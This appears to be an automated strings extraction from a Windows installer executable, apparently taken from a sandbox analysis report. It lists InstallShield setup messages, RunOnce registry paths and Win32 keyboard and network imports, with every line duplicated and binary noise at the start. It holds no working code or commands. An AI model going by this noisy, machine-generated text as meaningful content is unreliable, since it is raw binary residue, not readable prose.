$$!#&)&&'& ,&&(&(,(,&& (&,& &',&',&',&'& ',&,&,&,(,&,&,& &,&,',&
$$!#&)&&'& ,&&(&(,(,&& (&,& &',&',&',&'& ',&,&,&,(,&,&,& &,&,',&
#$)!))&',&,&,',&,&'& (,&& &'&''&'&'&'&&&''&'&&'(&'&'&'(&'(&&'&&',&
#$)!))&',&,&,',&,&'& (,&& &'&''&'&'&'&&&''&'&&'(&'&'&'(&'(&&'&&',&
$$!#*'*'* ,&&',&&'&&&&'"&&&&!&
$$!#*'*'* ,&&',&&'&&&&'"&&&&!&
!&&'&'(&(&&&'(&'&&'&'&((& &
!&&'&'(&(&&&'(&'&&'&'&((& &
#&&'&'&'&'&&&!&&!&
#&&'&'&'&'&&&!&&!&
&&&',& &,(,&,&,(,&,&,& &(&
&&&',& &,(,&,&,(,&,&,& &(&
#!&&''!&&!&
#!&&''!&&!&
!& (&(&(&'&'&&&'&'&((&'(& &
!& (&(&(&'&'&&&'&'&((&'(& &
!)&,&&&!&
!)&,&&&!&
&'& &',&(,&,(,&,&,& &,&,(&
&'& &',&(,&,(,&,&,& &,&,(&
#!&&',&&&&!!
#!&&',&&&&!!
&&' ',&& &'&'&'(&'(&(&&'&'&
&&' ',&& &'&'&'(&'(&(&&'&'&
!& ,', (,&(,&,&,&,&,& (,&,&,
!& ,', (,&(,&,&,&,&,& (,&,&,
$!!)&& &',&''&&"!
$!!)&& &',&''&&"!
!!)&!''.,//,/',&&'(&'(&&&'&(&(&'&'
!!)&!''.,//,/',&&'(&'(&&&'&(&(&'&'
!$!)'&- /,///.01021//,',&,&,&,',(,&,&,&,&&
!$!)'&- /,///.01021//,',&,&,&,',(,&,&,&,&&
'&&&&!&!$
'&&&&!&!$
$#!&))&.'./10/4222442420/, &'(&&'&(&'&&'&'&'(,&
$#!&))&.'./10/4222442420/, &'(&&'&(&'&&'&'&'(,&
&&'&'&/#
&&'&'&/#
&&'"%"%!!
&&'"%"%!!
!&&"&&&"%&!%!$!$!))&'-. 1/22244447474442//'&,&,&,&,& (,&,&,&&'&'
!&&"&&&"%&!%!$!$!))&'-. 1/22244447474442//'&,&,&,&,& (,&,&,&&'&'
)"&"&"&"'&"&&"&!&&&&---.//2224447464474420, (&'(&&'&(&&'&'(&',&,&
)"&"&"&"'&"&&"&!&&&&---.//2224447464474420, (&'(&&'&(&&'&'(&',&,&
!&"'&&&,& &',06878787440 ,&,& &,(,& (,& (,&,& (,&
!&"'&&&,& &',06878787440 ,&,& &,(,& (,& (,&,& (,&
!&&&'(,&(&(&& 478878470.,'&(&(&&'&(&(&('(&&&'(&'&(
!&&&'(,&(&(&& 478878470.,'&(&(&&'&(&(&('(&&&'(&'&(
&"'&(&(& &'&&/47787745 ',&,& (,&,&,& &,& (,&,&,&'
&"'&(&(& &'&&/47787745 ',&,& (,&,&,& &,& (,&,&,&'
$'&&(&&&,&(&&&&.7877460 (&'&(&&'(&&'&(&&'(&'&&'&,&
$'&&(&&&,&(&&&&.7877460 (&'&(&&'(&&'&(&&'(&'&&'&,&
&&'&&'(&&(&'&& .478854,,&,&,& (,& (,& (,&,&,(,&,&(
&&'&&'(&&(&'&& .478854,,&,&,& (,& (,& (,&,&,(,&,&(
&'&,(& (,& &'&&,,68764,,&&'(&(&'&(&(&&(&(&&'&'(&'&
&'&,(& (,& &'&&,,68764,,&&'(&(&'&(&(&&(&(&&'&'(&'&
!)&'. /.,/ &(,&& &&',,0744.('(&'&&'&(&&'&'&(&(&&'&'(&'&
!)&'. /.,/ &(,&& &&',,0744.('(&'&&'&(&&'&'&(&(&&'&'(&'&
$!)&&- .,//2/// ,&&'(&,& &(,.40.,&'(&&'&'(&'(&(&&'&(&'(&'(&&'
$!)&&- .,//2/// ,&&'(&,& &(,.40.,&'(&&'&'(&'(&(&&'&(&'(&'(&&'
#!&)'*. ../2//2, & (& &'&(& &,45 ((,& (,&,&,&,& (,&,&,&,&,& (&
#!&)'*. ../2//2, & (& &'&(& &,45 ((,& (,&,&,&,& (,&,&,&,&,& (&
#$!)&- . /10/2///'(&&&'(,&,&(,,.., '&(&(&(&'&(&'(&'(&'&(&&'(&,&
#$!)&- . /10/2///'(&&&'(,&,&(,,.., '&(&(&(&'&(&'(&'(&'&(&&'(&,&
!#&)'. //1/02300, &&(,&&&'&',&,,,,&(,&,& &,',&,&,&,&,&,& (,&&'&
!#&)'. //1/02300, &&(,&&&'&',&,,,,&(,&,& &,',&,&,&,&,&,& (,&&'&
!)&- .,/010202/ '(&&&,(,&,&&',,&,&&&'&(&(&&&'&&'(&&'&'(&&& (,&
!)&- .,/010202/ '(&&&,(,&,&&',,&,&&&'&(&(&&&'&&'(&&'&'(&&& (,&
! ! !!&'- .0/102240.'(&&(&'&'(&(,&,',& (,&,& &,(,&,&,& (,&,& (,&&&'
! ! !!&'- .0/102240.'(&&(&'&'(&(,&,',& (,&,& &,(,&,&,& (,&,& (,&&&'
! "!!&& //.202440.,,'(&&&(,& &'&(&'&(&&'&(&'(&''((&(&(&'(&('(&'(,&
! "!!&& //.202440.,,'(&&&(,& &'&(&'&(&&'&(&'(&''((&(&(&'(&('(&'(,&
" ! "!&& /.2024.440'&&&'&,&(&(,&,&,&,& (,&,&,&,&,& & &,&,&,& &,',&'
" ! "!&& /.2024.440'&&&'&,&(&(,&,&,&,& (,&,&,&,&,& & &,&,&,& &,',&'
! "!"! !'/1244420,'&'&&&'(&&',&,&,& (,& (,&,&,&,& & &,(,&,&,& (,&,
! "!"! !'/1244420,'&'&&&'(&&',&,&,& (,& (,&,&,&,& & &,(,&,&,& (,&,
'.42442, (&&(&(&(&,&&'&(&'(&'&(&&&'&&(&'(&(&&&'&&(&'(&'(&
'.42442, (&&(&(&(&,&&'&(&'(&'&(&&&'&&(&'(&(&&&'&&(&'(&'(&
"! !!!&/24445 &&'&&&'&&'(,&,&,&,&,&,& (,&,&,&,&,& (,&,&,&,&,& &
"! !!!&/24445 &&'&&&'&&'(,&,&,&,&,&,& (,&,&,&,&,& (,&,&,&,&,& &
"! ! ! &,0472.'(&&&'(&(&(&'(&(&'&&&'&((&'((&'&&'&((&'((&'&&'&((&
"! ! ! &,0472.'(&&&'(&(&(&'(&(&'&&&'&((&'((&'&&'&((&'((&'&&'&((&
! " "!"! " 0440,'&&&'&&&&(&',& &,',(,&,& &,& &,(,&,& &,& &,(,&,& &
! " "!"! " 0440,'&&&'&&&&(&',& &,',(,&,& &,& &,(,&,& &,& &,(,&,& &
"! " !&'.445''&'"&'(&&&&(&&(&(&&'&(&'((&'(&&'&(&'((&'(&&'&(&'(&
"! " !&'.445''&'"&'(&&&&(&&(&(&&'&(&'((&'(&&'&(&'((&'(&&'&(&'(&
!! "! "!&"&,24.(&&&&'&'&(&(&(,& & (,& &,& &,& (,& &,& &,& (,& &,&
!! "! "!&"&,24.(&&&&'&'&(&(&(,& & (,& &,& &,& (,& &,& &,& (,& &,&
!" ! ""& .5,'&"'"&&&'&'& &(&((&((&((&((&((&((&((&((&((&((&((&('
!" ! ""& .5,'&"'"&&&'&'& &(&((&((&((&((&((&((&((&((&((&((&((&('
!"!&"&"'..,'&&&''&'&&'&',& & & & & & & & & & & & & & & & & & &
!"!&"&"'..,'&&&''&'&&'&',& & & & & & & & & & & & & & & & & & &
! &" "&& &&'&&'&&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'(
! &" "&& &&'&&'&&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'(
&[[[[FKEEEC?953).ILSPPRRPSTVVWYYZZZ[[[[[[Q&
&[[[[FKEEEC?953).ILSPPRRPSTVVWYYZZZ[[[[[[Q&
####'"""!
####'"""!
7
7
##''((,-6!
##''((,-6!
DrF.Df2
DrF.Df2
.WW.{
.WW.{
3333333
3333333
version="1.0.0.0"
version="1.0.0.0"
name="InstallShield.Setup"
name="InstallShield.Setup"
InstallShield.Setup
InstallShield.Setup
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
InstallShield.SetupPPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
InstallShield.SetupPPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
@File=%s
@File=%s
Folder=%s
Folder=%s
explorer.exe
explorer.exe
@hXXp://
@hXXp://
0xx
0xx
123.tmp
123.tmp
KERNEL32.DLL
KERNEL32.DLL
>%s (%d)
>%s (%d)
PAPP:%s
PAPP:%s
PVENDOR:%s
PVENDOR:%s
PGUID:%s
PGUID:%s
ErrorInformation=%s
ErrorInformation=%s
setup.log
setup.log
%ld : 0x%x
%ld : 0x%x
@.msi
@.msi
..\..\Shared\Setup\IsPreReqDlg.cpp
..\..\Shared\Setup\IsPreReqDlg.cpp
Prerequisites need elevation; launching elevated with arguments: %s
Prerequisites need elevation; launching elevated with arguments: %s
MSI or .NET rebooting before prerequsite
MSI or .NET rebooting before prerequsite
StartStopProgress - Fallback - %d of %d
StartStopProgress - Fallback - %d of %d
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
%%IS_PREREQ%%-%s
%%IS_PREREQ%%-%s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce
%s.%s
%s.%s
%s: %s
%s: %s
Default.prq
Default.prq
DownloadFiles: %s
DownloadFiles: %s
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
hXXps://
hXXps://
installfromweb:
installfromweb:
show_eval_msg
show_eval_msg
show_beta_msg
show_beta_msg
show_err_msg
show_err_msg
show_err_msg_invalid_identity
show_err_msg_invalid_identity
ShowPasswordDialog
ShowPasswordDialog
CompanyURL
CompanyURL
hXXp://VVV.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%d : 0x%x&ErrorInfo=%s
hXXp://VVV.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%d : 0x%x&ErrorInfo=%s
ErrorReportURL
ErrorReportURL
cmdline
cmdline
Supported
Supported
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
data1.hdr
data1.hdr
APTF://
APTF://
data1.cab
data1.cab
MPR.DLL
MPR.DLL
This setup was created with a BETA VERSION of %s
This setup was created with a BETA VERSION of %s
This setup was created with a EVALUATION VERSION of %s
This setup was created with a EVALUATION VERSION of %s
This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s hours after they were built. Please rebuild the setup to run it again. The setup will now exit.
This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s hours after they were built. Please rebuild the setup to run it again. The setup will now exit.
EXE=%s
EXE=%s
setup.ini
setup.ini
\Engine\Log
\Engine\Log
SUPPORTDIR
SUPPORTDIR
SHOW_PASSWORD_DIALOG
SHOW_PASSWORD_DIALOG
HeaderPathFile=%s
HeaderPathFile=%s
User=%s
User=%s
Password=%s
Password=%s
ProxyUser=%s
ProxyUser=%s
ProxyPassword=%s
ProxyPassword=%s
Result=%s
Result=%s
-sel_langx
-sel_langx
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
setupdir\x
setupdir\x
setup.bmp
setup.bmp
setup.gif
setup.gif
SourceFile=%s
SourceFile=%s
TargetFile=%s
TargetFile=%s
0xlx.ini
0xlx.ini
B..\..\Shared\Setup\SetupPrereqMgr.cpp
B..\..\Shared\Setup\SetupPrereqMgr.cpp
Running setup prerequisites (%s)...
Running setup prerequisites (%s)...
%%IS_PREREQF%%-%s
%%IS_PREREQF%%-%s
Prerequisites returning %d
Prerequisites returning %d
Checking setup prerequisite '%s'
Checking setup prerequisite '%s'
Prerequisite '%s' scheduled before feature selection
Prerequisite '%s' scheduled before feature selection
Features do not match for prerequisite '%s'
Features do not match for prerequisite '%s'
Features match for prerequisite '%s'
Features match for prerequisite '%s'
Marking prerequisite '%s' for install during ADMIN install
Marking prerequisite '%s' for install during ADMIN install
Skipping prerequisite '%s' because it was installed before the reboot
Skipping prerequisite '%s' because it was installed before the reboot
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
B/passive
B/passive
..\..\Shared\Setup\SetupPreRequisite.cpp
..\..\Shared\Setup\SetupPreRequisite.cpp
CSetupPrerequisite::ExecutePrerequisite
CSetupPrerequisite::ExecutePrerequisite
Attempting to execute prerequisite: %s
Attempting to execute prerequisite: %s
Return Code from EXE: %d
Return Code from EXE: %d
CSetupPreRequisite::ExecuteGenericPrerequisite
CSetupPreRequisite::ExecuteGenericPrerequisite
Creating new process for prerequisite, launching command line %s [%s] %s
Creating new process for prerequisite, launching command line %s [%s] %s
Prerequisite process exited with return code %d
Prerequisite process exited with return code %d
Could not launch prerequisite, last error: %d, ShellExecute: %d
Could not launch prerequisite, last error: %d, ShellExecute: %d
CSetupPreRequisite::ExecuteMsiWithProgress
CSetupPreRequisite::ExecuteMsiWithProgress
Launching MSI prerequisite %s, command line %s
Launching MSI prerequisite %s, command line %s
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations
SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations
PendingFileRenameOperations
PendingFileRenameOperations
[WindowsFolder]Wininit.ini
[WindowsFolder]Wininit.ini
Reboot required - %s key added
Reboot required - %s key added
FileRenameOperations
FileRenameOperations
Wininit.ini rename
Wininit.ini rename
%s,%s,%s,%s,%s,%s
%s,%s,%s,%s,%s,%s
operatingsystemcondition
operatingsystemcondition
AltPrqURL
AltPrqURL
cmdlinesilent
cmdlinesilent
[WindowsFolder]
[WindowsFolder]
[SETUPEXENAME]
[SETUPEXENAME]
[SETUPEXEDIR]
[SETUPEXEDIR]
%ld %s
%ld %s
%s %ld %s
%s %ld %s
d.d %s%s
d.d %s%s
ISBEW64.exe
ISBEW64.exe
kernel32.dll
kernel32.dll
%s%s%d.%s
%s%s%d.%s
SetupExe: %ls
SetupExe: %ls
SetupExeVersion: %ld.%ld.%ld.%ld
SetupExeVersion: %ld.%ld.%ld.%ld
Windows 95
Windows 95
Windows 98
Windows 98
Windows Me
Windows Me
Windows NT 4.0
Windows NT 4.0
Windows 2000
Windows 2000
Windows XP
Windows XP
Windows Server 2003
Windows Server 2003
Windows Vista / Server 2008
Windows Vista / Server 2008
Windows 7 / Server 2008 R2
Windows 7 / Server 2008 R2
Windows 8 / Server 2012
Windows 8 / Server 2012
Windows 8.1 / Server 2012 R2
Windows 8.1 / Server 2012 R2
.Default\Control Panel\desktop\ResourceLocale
.Default\Control Panel\desktop\ResourceLocale
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
PSTORES.EXE
PSTORES.EXE
psapi.dll
psapi.dll
Ntdll.dll
Ntdll.dll
Cwininet.dll
Cwininet.dll
RPAWINET.DLL
RPAWINET.DLL
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
AutoConfigURL
AutoConfigURL
Range: bytes=%d-
Range: bytes=%d-
dest%d
dest%d
source%d
source%d
InstallShieldPendingOperation
InstallShieldPendingOperation
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
USER32.DLL
USER32.DLL
%hx.rra
%hx.rra
uxtheme.dll
uxtheme.dll
%d,%d
%d,%d
%d,%d,%d
%d,%d,%d
Shcore.dll
Shcore.dll
E.dll
E.dll
Advapi32.dll
Advapi32.dll
InstallShield.log
InstallShield.log
%s[%s]: %s -- File: %s, Line: %d
%s[%s]: %s -- File: %s, Line: %d
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup.exe
@@10554;200
@@10554;200
Do you wish to install %s?
Do you wish to install %s?
This software has not been altered since publication by %s. To install %s, click OK.
This software has not been altered since publication by %s. To install %s, click OK.
Caution: %s affirms this software is safe. You should only continue if you trust %s to make this assertion.
Caution: %s affirms this software is safe. You should only continue if you trust %s to make this assertion.
The identity of this software publisher was verified by %s.
The identity of this software publisher was verified by %s.
&Always trust software published by %s.
&Always trust software published by %s.
@@10652;200
@@10652;200
You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.
You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.
Please enter the password
Please enter the password
Password:
Password:
%sc%1 Setup is preparing the %2, which will guide you through the program setup process. Please wait.!Checking Operating System Version%Checking Windows(R) Installer Version
%sc%1 Setup is preparing the %2, which will guide you through the program setup process. Please wait.!Checking Operating System Version%Checking Windows(R) Installer Version
Configuring Windows Installer
Configuring Windows Installer
Configuring %s
Configuring %s
Setup has completed configuring the Windows Installer on your system. The system needs to be restarted in order to continue with the installation. Please click Restart to reboot the system.
Setup has completed configuring the Windows Installer on your system. The system needs to be restarted in order to continue with the installation. Please click Restart to reboot the system.
The installer must restart your system to complete configuring the Windows Installer service. Click Yes to restart now or No if you plan to restart later.DThis setup will perform an upgrade of '%s'. Do you want to continue?XA later version of '%s' is already installed on this machine. The setup cannot continue.
The installer must restart your system to complete configuring the Windows Installer service. Click Yes to restart now or No if you plan to restart later.DThis setup will perform an upgrade of '%s'. Do you want to continue?XA later version of '%s' is already installed on this machine. The setup cannot continue.
Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running either Windows 95 (or later version), or Windows NT 4.0 Service Pack 6 (or later version), before relaunching the installation'Error writing to the temporary location
Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running either Windows 95 (or later version), or Windows NT 4.0 Service Pack 6 (or later version), before relaunching the installation'Error writing to the temporary location
-Error extracting %s to the temporary location'Error reading setup initialization file
-Error extracting %s to the temporary location'Error reading setup initialization file
Installer not found in %s
Installer not found in %s
File %s not found#Internal error in Windows Installer
File %s not found#Internal error in Windows Installer
IError populating strings. Verify that all strings in Setup.ini are valid.
IError populating strings. Verify that all strings in Setup.ini are valid.
RestartQSetup needs %lu KB free disk space in %s. Please free up some space and try again
RestartQSetup needs %lu KB free disk space in %s. Please free up some space and try again
/V parameters to MsiExec.exejWindows(R) Installer %s found. This is an older version of the Windows(R) Installer. Click OK to continue.
/V parameters to MsiExec.exejWindows(R) Installer %s found. This is an older version of the Windows(R) Installer. Click OK to continue.
ANSI code page for %s is not installed on the system and therefore setup cannot run in the selected language. Run the setup and select another language.
ANSI code page for %s is not installed on the system and therefore setup cannot run in the selected language. Run the setup and select another language.
Setup requires Windows Installer version %s or higher to install the Microsoft .NET Framework version 2.0. Please install the Windows Installer version %s or higher and try again.
Setup requires Windows Installer version %s or higher to install the Microsoft .NET Framework version 2.0. Please install the Windows Installer version %s or higher and try again.
xThis setup does not contain the Windows Installer engine (%s) required to run the installation on this operating system.
xThis setup does not contain the Windows Installer engine (%s) required to run the installation on this operating system.
'Unable to install %s Scripting Runtime.8Unable to create InstallDriver instance, Return code: %d;Please specify a location to save the installation package.
'Unable to install %s Scripting Runtime.8Unable to create InstallDriver instance, Return code: %d;Please specify a location to save the installation package.
Unable to extract the file %s.
Unable to extract the file %s.
Downloading file %s.LAn error occurred while downloading the file %s. What would you like to do?
Downloading file %s.LAn error occurred while downloading the file %s. What would you like to do?
/sec&Failed to verify signature of file %s.
/sec&Failed to verify signature of file %s.
Estimated time remaining: %d %s of %d %s downloaded at d.d %s%s
Estimated time remaining: %d %s of %d %s downloaded at d.d %s%s
Unable to save file: %s Failed to complete installation.
Unable to save file: %s Failed to complete installation.
/UA
/UA
/UW
/UW
/UM
/UM
/US8Setup Initialization Error, failed to clone the process.:The file %s already exists. Would you like to replace it?
/US8Setup Initialization Error, failed to clone the process.:The file %s already exists. Would you like to replace it?
_Could not verify signature. You need Internet Explorer 3.02 or later with Authenticode update.hSetup requires a newer version of WinInet.dll. You may need to install Internet Explorer 3.02 or later.}You do not have sufficient privileges to complete this installation. Log on as administrator and then retry this installation=Error installing Microsoft(R) .NET Framework, Return Code: %dZ%s optionally uses the Microsoft (R) .NET %s Framework. Would you like to install it now?
_Could not verify signature. You need Internet Explorer 3.02 or later with Authenticode update.hSetup requires a newer version of WinInet.dll. You may need to install Internet Explorer 3.02 or later.}You do not have sufficient privileges to complete this installation. Log on as administrator and then retry this installation=Error installing Microsoft(R) .NET Framework, Return Code: %dZ%s optionally uses the Microsoft (R) .NET %s Framework. Would you like to install it now?
Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running either Windows 95 (or later version), or Windows NT 4.0 Service Pack 3 (or later version), before relaunching the installation\%s optionally uses the Visual J# Redistributable Package. Would you like to install it now? - (This will also install the .NET Framework.)
Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running either Windows 95 (or later version), or Windows NT 4.0 Service Pack 3 (or later version), before relaunching the installation\%s optionally uses the Visual J# Redistributable Package. Would you like to install it now? - (This will also install the .NET Framework.)
Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running Windows 2000 Service Pack 3 (or later version), before relaunching the installationw%s requires the following items to be installed on your computer. Click Install to begin installing these requirements.
Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running Windows 2000 Service Pack 3 (or later version), before relaunching the installationw%s requires the following items to be installed on your computer. Click Install to begin installing these requirements.
Installing %sDWould you like to cancel the setup after %s has finished installing?
Installing %sDWould you like to cancel the setup after %s has finished installing?
The files for installation requirement %s could not be found. The installation will now stop. This is probably due to a failed, or canceled download.XThe installation of %s appears to have failed. Do you want to continue the installation?
The files for installation requirement %s could not be found. The installation will now stop. This is probably due to a failed, or canceled download.XThe installation of %s appears to have failed. Do you want to continue the installation?
Skipped7The installation of %s has failed. Setup will now exit.gThe installation of %s requires a reboot. Click Yes to restart now or No if you plan to restart later.8%1 optionally uses %2. Would you like to install it now?
Skipped7The installation of %s has failed. Setup will now exit.gThe installation of %s requires a reboot. Click Yes to restart now or No if you plan to restart later.8%1 optionally uses %2. Would you like to install it now?
&Patch an existing instanceWThis installation requires Windows Installer version 4.5 or newer. Setup will now exit.
&Patch an existing instanceWThis installation requires Windows Installer version 4.5 or newer. Setup will now exit.
Authenticity Verified;The identity of this software publisher was verified by %s.lCaution: %s affirms this software is safe. You should only continue if you trust %s to make this assertion.'&Always trust software published by %s.UThis software has not been altered since publication by %s. To install %s, click OK.
Authenticity Verified;The identity of this software publisher was verified by %s.lCaution: %s affirms this software is safe. You should only continue if you trust %s to make this assertion.'&Always trust software published by %s.UThis software has not been altered since publication by %s. To install %s, click OK.
%s - InstallShield Wizard
%s - InstallShield Wizard
Setup has detected one or more instances of this application already installed on your system. You can maintain or update an existing instance or install a completely new instance.MSelect the instance of the application you want to &maintain or update below:
Setup has detected one or more instances of this application already installed on your system. You can maintain or update an existing instance or install a completely new instance.MSelect the instance of the application you want to &maintain or update below:
x%s Setup is preparing the InstallShield Wizard, which will guide you through the rest of the setup process. Please wait.
x%s Setup is preparing the InstallShield Wizard, which will guide you through the rest of the setup process. Please wait.
Error Information:3An error (%s) has occurred while running the setup.
Error Information:3An error (%s) has occurred while running the setup.
Please make sure you have finished any previous setup and closed other applications. If the error still occurs, please contact your vendor: %s.
Please make sure you have finished any previous setup and closed other applications. If the error still occurs, please contact your vendor: %s.
&Report}There is not enough space to initialize the setup. Please free up at least %ld KB on your %s drive before you run the setup.{A user with administrator rights installed this application. You need to have similar privileges to modify or uninstall it.tAnother instance of this setup is already running. Please wait for the other instance to finish and then try again.
&Report}There is not enough space to initialize the setup. Please free up at least %ld KB on your %s drive before you run the setup.{A user with administrator rights installed this application. You need to have similar privileges to modify or uninstall it.tAnother instance of this setup is already running. Please wait for the other instance to finish and then try again.
The origin and integrity of this application could not be verified. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.
The origin and integrity of this application could not be verified. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.
The origin and integrity of this application could not be verified because it was not signed by the publisher. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.
The origin and integrity of this application could not be verified because it was not signed by the publisher. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.
The origin and integrity of this application could not be verified. The certificate used to sign the software has expired or is invalid or untrusted. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.jThe software is corrupted or has been altered since it was published. You should not continue this setup.0This setup was created with a BETA VERSION of %s7This Setup was created with an EVALUATION VERSION of %s
The origin and integrity of this application could not be verified. The certificate used to sign the software has expired or is invalid or untrusted. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.jThe software is corrupted or has been altered since it was published. You should not continue this setup.0This setup was created with a BETA VERSION of %s7This Setup was created with an EVALUATION VERSION of %s
This setup was created with an EVALUATION VERSION of %s, which does not support extraction of the internal MSI file. The full version of InstallShield supports this functionality. For more information, see InstallShield KB article Q200900.
This setup was created with an EVALUATION VERSION of %s, which does not support extraction of the internal MSI file. The full version of InstallShield supports this functionality. For more information, see InstallShield KB article Q200900.
This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s days after they were built. Please rebuild the setup to run it again. The setup will now exit.3This setup works until %s. The setup will now exit.
This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s days after they were built. Please rebuild the setup to run it again. The setup will now exit.3This setup works until %s. The setup will now exit.
The path to the installation contains unsupported characters. Try moving the installation to a location that does not have special characters, and then try relaunching it.iThis setup requires administrative privileges that appear to be unavailable. Would you like to try again?
The path to the installation contains unsupported characters. Try moving the installation to a location that does not have special characters, and then try relaunching it.iThis setup requires administrative privileges that appear to be unavailable. Would you like to try again?
Copyright (c) 2014 Flexera Software LLC. All Rights Reserved.
Copyright (c) 2014 Flexera Software LLC. All Rights Reserved.
InstallShield Setup.exe
InstallShield Setup.exe
21.0.289
21.0.289
Index.exe_1204:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
SSh8*K
SSh8*K
.hP6K
.hP6K
PSSSSSSh
PSSSSSSh
Gt.Ht$
Gt.Ht$
t.jGZf;
t.jGZf;
PSSShl
PSSShl
PVSShl
PVSShl
j.Zf;
j.Zf;
;K|s%f
;K|s%f
?#%X.y
?#%X.y
GetProcessWindowStation
GetProcessWindowStation
operator
operator
kernel32.dll
kernel32.dll
oleaut32.dll
oleaut32.dll
RegDeleteKeyExW
RegDeleteKeyExW
advapi32.dll
advapi32.dll
Error text not found (please report)
Error text not found (please report)
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
\N is not supported in a class
WSOCK32.dll
WSOCK32.dll
VERSION.dll
VERSION.dll
WINMM.dll
WINMM.dll
COMCTL32.dll
COMCTL32.dll
MPR.dll
MPR.dll
InternetCrackUrlW
InternetCrackUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
FtpOpenFileW
FtpOpenFileW
FtpGetFileSize
FtpGetFileSize
InternetOpenUrlW
InternetOpenUrlW
WININET.dll
WININET.dll
PSAPI.DLL
PSAPI.DLL
IPHLPAPI.DLL
IPHLPAPI.DLL
USERENV.dll
USERENV.dll
UxTheme.dll
UxTheme.dll
GetProcessHeap
GetProcessHeap
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
OpenWindowStationW
OpenWindowStationW
SetProcessWindowStation
SetProcessWindowStation
CloseWindowStation
CloseWindowStation
MapVirtualKeyW
MapVirtualKeyW
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
VkKeyScanW
VkKeyScanW
GetKeyState
GetKeyState
GetKeyboardState
GetKeyboardState
SetKeyboardState
SetKeyboardState
GetAsyncKeyState
GetAsyncKeyState
keybd_event
keybd_event
EnumThreadWindows
EnumThreadWindows
ExitWindowsEx
ExitWindowsEx
UnregisterHotKey
UnregisterHotKey
RegisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
